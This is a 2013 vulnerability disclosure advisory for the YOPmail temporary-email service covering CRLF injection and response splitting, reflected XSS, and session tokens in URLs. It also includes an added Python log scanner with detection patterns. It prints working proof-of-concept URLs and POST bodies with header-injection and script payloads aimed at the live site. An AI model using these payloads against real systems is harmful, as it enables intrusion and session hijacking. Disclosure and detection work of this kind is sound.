
YOPMail XSS / Injection / HTTP Response Splitting

Posted Jun 28, 2013
Authored by Juan Carlos Garcia

YOPMail suffers from cross site scripting, HTTP response splitting, CRLF injection, and session token handling vulnerabilities.

tags | exploit, web, vulnerability, xss
MD5 | a5d9881d634167e06e2db886f4cca8b3

YOPMAIL (Anonymous & Free email address) CRLF Injection / HTTP Response Splitting / XSS / Session Token in URL
==============================================================================================================


Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: RESPONSE
2013-06-07: Ask About the issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Ask About the Issues
2013-06-27: Not Fixed / No Response
2013-06-28: Full Disclosure


I-VULNERABILITIES
======================

#Title: YOPMAIL (Anonymous & Free email address) CRLF Injection / HTTP Response Splitting / XSS / Session Token in URL

#Vendor:http://www.yopmail.com

#Author:Juan Carlos García (@secnight)

#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight


II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days.
It's possible to send a message to another YOPmail address. No registration is required. Firefox, Internet Explorer 7 and Opera add-ons are
downloadable. There are alternate domains.

Domains

@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.


III-PROOF OF CONCEPT
======================

CRLF INJECTION-HTTP RESPONSE SPLITTING
______________________________________

The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers
are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS (cross-site scripting), cross-user
defacement, poisoning of the client's web cache, hijacking of web pages, defacement and a myriad of other related attacks.

Attacks
-------

http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717


Multiple CROSS SITE SCRIPTING
_______________________________

The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a
manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.

Attacks
--------

Below I expose only a few of the vulnerabilities, because this web service has a great many failures of this type. So much XSS...

Affected items
/add-domain.php
/alternate-domains.php
/alternate-email-address.php
/conditions.php
/contact.php
/definitions/email-jetable.php
/definitions/mail-anonyme.php
/definitions/spam.php
/donation.php
/email-anonyme.php
/email-generator.php
/en
/en/add-domain.php
/en/alternate-domains.php
/en/alternate-email-address.php
/en/conditions.php
/en/contact.php
/en/definitions
/en/definitions/email-jetable.php
/en/definitions/mail-anonyme.php
/en/definitions/spam.php
/en/donation.php
/en/email-anonyme.php
/en/email-generator.php
/en/faq.php
/en/images
/en/index.php
/en/plugins.php
/en/privacy.php
/en/send-mail.php
/en/style
/en/style/pic
/en/yopmail-chat.php
/es
/es/add-domain.php
/es/alternate-domains.php
/es/alternate-email-address.php
/es/conditions.php
/es/contact.php
/es/definitions
/es/definitions/email-jetable.php
/es/definitions/mail-anonyme.php
/es/definitions/spam.php
/es/donation.php
/es/email-anonyme.php
/es/email-generator.php
/es/faq.php
/es/images
/es/index.php
/es/plugins.php
/es/privacy.php
/es/send-mail.php
/es/style
/es/style/pic
/es/yopmail-chat.php
/faq.php
/fr
/fr/add-domain.php
/fr/alternate-domains.php
/fr/alternate-email-address.php
/fr/conditions.php
/fr/contact.php
/fr/definitions
/fr/definitions/email-jetable.php
/fr/definitions/mail-anonyme.php
/fr/definitions/spam.php
/fr/donation.php
/fr/email-anonyme.php
/fr/email-generator.php
/fr/faq.php
/fr/images
/fr/index.php
/fr/plugins.php
/fr/privacy.php
/fr/send-mail.php
/fr/style
/fr/style/pic
/fr/yopmail-chat.php
/index.php
/it
/it/add-domain.php
/it/alternate-domains.php
/it/alternate-email-address.php
/it/conditions.php
/it/contact.php
/it/definitions
/it/definitions/email-jetable.php
/it/definitions/mail-anonyme.php
/it/definitions/spam.php
/it/donation.php
/it/email-anonyme.php
/it/email-generator.php
/it/faq.php
/it/images
/it/index.php
/it/plugins.php
/it/privacy.php
/it/send-mail.php
/it/style
/it/style/pic
/it/yopmail-chat.php
/pl
/pl/add-domain.php
/pl/alternate-domains.php
/pl/alternate-email-address.php
/pl/conditions.php
/pl/contact.php
/pl/definitions
/pl/definitions/email-jetable.php
/pl/definitions/mail-anonyme.php
/pl/definitions/spam.php
/pl/donation.php
/pl/email-anonyme.php
/pl/email-generator.php
/pl/faq.php
/pl/images
/pl/index.php
/pl/plugins.php
/pl/privacy.php
/pl/send-mail.php
/pl/style
/pl/style/pic
/pl/yopmail-chat.php
/plugins.php
/privacy.php
/ru
/ru/add-domain.php
/ru/alternate-domains.php
/ru/alternate-email-address.php
/ru/conditions.php
/ru/contact.php
/ru/definitions
/ru/definitions/email-jetable.php
/ru/definitions/mail-anonyme.php
/ru/definitions/spam.php
/ru/donation.php
/ru/email-anonyme.php
/ru/email-generator.php
/ru/faq.php
/ru/images
/ru/index.php
/ru/plugins.php
/ru/privacy.php
/ru/send-mail.php
/ru/style
/ru/style/pic
/ru/yopmail-chat.php
/send-mail.php
/uk
/uk/add-domain.php
/uk/alternate-domains.php
/uk/alternate-email-address.php
/uk/conditions.php
/uk/contact.php
/uk/definitions
/uk/definitions/email-jetable.php
/uk/definitions/mail-anonyme.php
/uk/definitions/spam.php
/uk/donation.php
/uk/email-anonyme.php
/uk/email-generator.php
/uk/faq.php
/uk/images
/uk/index.php
/uk/plugins.php
/uk/privacy.php
/uk/send-mail.php
/uk/style
/uk/style/pic
/uk/yopmail-chat.php
/yopmail-chat.php
/zh
/zh/add-domain.php
/zh/alternate-domains.php
/zh/alternate-email-address.php
/zh/conditions.php
/zh/contact.php
/zh/definitions
/zh/definitions/email-jetable.php
/zh/definitions/mail-anonyme.php
/zh/definitions/spam.php
/zh/donation.php
/zh/email-anonyme.php
/zh/email-generator.php
/zh/faq.php
/zh/images
/zh/index.php
/zh/plugins.php
/zh/privacy.php
/zh/send-mail.php
/zh/style
/zh/style/pic
/zh/yopmail-chat.php

Method GET
----------

http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec

http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec

http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid

http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E

http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E

http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E

http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E

http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E

http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E

Method POST
------------

http://www.yopmail.com:80/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


SESSION TOKEN IN URL
____________________

This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL.
URLs could be logged or leaked via the Referer header.

Affected items
--------------

/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)

Examples

Method GET
----------

http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&

http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Method POST
-----------

/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
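The three issue classes above (CRLF in a query value, a PHPSESSID carried in the URL, and script/event-handler probes in paths and parameters) all leave a signature in ordinary web server access logs. The following is an added example, not part of the advisory or YOPmail's code: a small Python scanner that percent-decodes each logged request and flags those patterns, plus the server-side header check that stops the response-splitting case. The log lines are constructed to mirror the request shapes shown above; the parameter names and findings labels are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (not real YOPmail logs) in common log format,
# modelled on the request shapes in the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Jun/2013:10:00:01 +0000] "GET /cr.php?cfg=%0d%0a%20X-Injected%3ayes&r=211 HTTP/1.1" 200 512
203.0.113.5 - - [28/Jun/2013:10:00:02 +0000] "GET /es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 HTTP/1.1" 200 2048
203.0.113.5 - - [28/Jun/2013:10:00:03 +0000] "GET /en/images/1%3CScRiPt%3Eprompt(1)%3C/ScRiPt%3E HTTP/1.1" 404 300
198.51.100.9 - - [28/Jun/2013:10:00:04 +0000] "GET /en/faq.php HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SESSION_PARAMS = {"phpsessid"}  # query parameter names that carry a session id
# A literal <script> tag, or a quoted attribute break followed by an on*= handler,
# as in the advisory's GET and POST probes.
SCRIPT_RE = re.compile(r"""<\s*script|["']\s*on[a-z]+\s*=""", re.IGNORECASE)


def classify_request(target: str) -> list[str]:
    """Return the findings for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    decoded = unquote(parts.path) + "?" + unquote(parts.query)
    # Response splitting: a decoded CR or LF can end a header line on the server side.
    if "\r" in decoded or "\n" in decoded:
        findings.append("crlf-injection")
    # Session token in the URL: it lands in access logs, proxies and Referer headers.
    if any(name.lower() in SESSION_PARAMS
           for name, _ in parse_qsl(parts.query, keep_blank_values=True)):
        findings.append("session-token-in-url")
    if SCRIPT_RE.search(decoded):
        findings.append("reflected-xss-probe")
    return findings


def scan_log(text: str) -> dict[str, list[str]]:
    """Map each flagged request target to its list of findings."""
    hits = {}
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m and (findings := classify_request(m.group("target"))):
            hits[m.group("target")] = findings
    return hits


def safe_header_value(value: str) -> str:
    """Server-side mitigation: refuse to emit a header whose value contains CR or LF."""
    if "\r" in value or "\n" in value:
        raise ValueError("header value contains CR/LF")
    return value
```

Running `scan_log(SAMPLE_LOG)` flags the first three constructed lines and leaves the plain `/en/faq.php` request alone; `safe_header_value` is the check a PHP `header()` wrapper (or any framework) should apply before copying a request parameter into a response header.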



IV. CREDITS
-------------------------

These vulnerabilities have been discovered
by Juan Carlos García (@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.

© 2019 Packet Storm. All rights reserved.